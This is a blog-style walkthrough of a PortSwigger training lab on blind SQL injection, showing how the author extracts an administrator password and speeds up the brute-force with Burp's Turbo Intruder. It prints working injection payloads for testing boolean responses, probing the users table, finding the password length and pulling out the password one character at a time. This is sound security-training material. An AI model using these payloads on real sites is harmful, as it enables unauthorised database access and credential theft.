Reducing your brute-force attack time with Turbo intruder
Pre-requisites: SQL, Burpsuite
Portswigger's web security academy has good quality web security courses and exercises. One of the exercises about SQL injection is Blind SQL injection with conditional responses (link here). In this post, I will share my experience of how I reduced the time required to brute-force a password from 3 hours to 2 minutes using turbo-intruder burp suite.
Let's start with an exercise description:
The exercise asks us to perform a blind SQL injection to the website. Blind SQL injection is an injection that happens when we don't see the result coming from the server. However, we know the effect of the result.
The exercise explains that the vulnerable parameter of the page is tracking id. If we hadn't known the vulnerable parameter, we would fuzz every parameter that communicates with the server and try to see it is susceptible to SQL injection.
In this case, we assume the query requesting data using tracking id works like the following code:
SELECT tracking-id from tracking-table where trackingId = 'the tracking id in the cookie' => the last part is parameter susciptle for SQL injection.I finished the exercise using the Burp Suite. I used proxy, repeater, and intruder tools to accomplish and improve the Bruteforce using the turbo burp suite.
Step 1. Check if it is vulnerable to SQL injection or not.
We use two payloads to check if it is vulnerable to SQL injection or not:
' and 1=1 - - This should return welcome to
' and 1=2 - - This should not return welcome message
The final SQL command after injection will be:Select tracking-id from tracking-table where trackingId='tracking-id'and 1=1 -- '
Step 2) Confirm if we have a users table;
The payload used is as follows
' and (select 'x' from users LIMIT 1)='x' --This makes the overall SQL command to be:SELECT tracking-id from tracking-table where tracking-id='tracking-cookie' and (select 'a' from users LIMIT 1)='a' -- '
Step 3) Since we know user administrator exists, let's try to figure out the length of the password. Here we use intruder. The payload will be:
' AND (SELECT username from users where username='administrator' and LENGTH(password)>$length_variable)='administrator' --This results in the following query:SELECT tracking-id from tracking_table where tracking-id='tracking_cookie' and LENGTH(password)>$length_variable)='administrator' --
If the query does not respond with a positive result, the password length is one less than the current length.
Step 4) Determining the password. For this, we will use two methods. The payload will be:
' AND (SELECT substring(password,1,1) from users where username='administrator') ='a'-- Resulting in the the following querySELECT tracking-id from tracking-table where tracking-id='tracking_cookie' AND (SELECT substring(password,1,1) from users where username='administrator') ='a'-- '
As shown in the above image, we are testing multiple letters to all 20 positions and when we get the positive reply, we have got the correct character for that position.
As given in the above image, the 2nd letter of the password is the letter 'a'. In this way, we can brute-force the whole password.
NB: THIS METHOD TAKES 3 HOURS TO FINISH.
Now instead of sending the request into builtin intruder, we will send it to turbo-intruder installed using the Extender tool. The main advantage of turbo intruder customized requests.
After sending the request to the turbo intruder, we mark the position where we want to put our payload using the '%s' sign.
The two for-loops are used to define the payloads in the target positions. Running this gave me the result in 2 minutes.
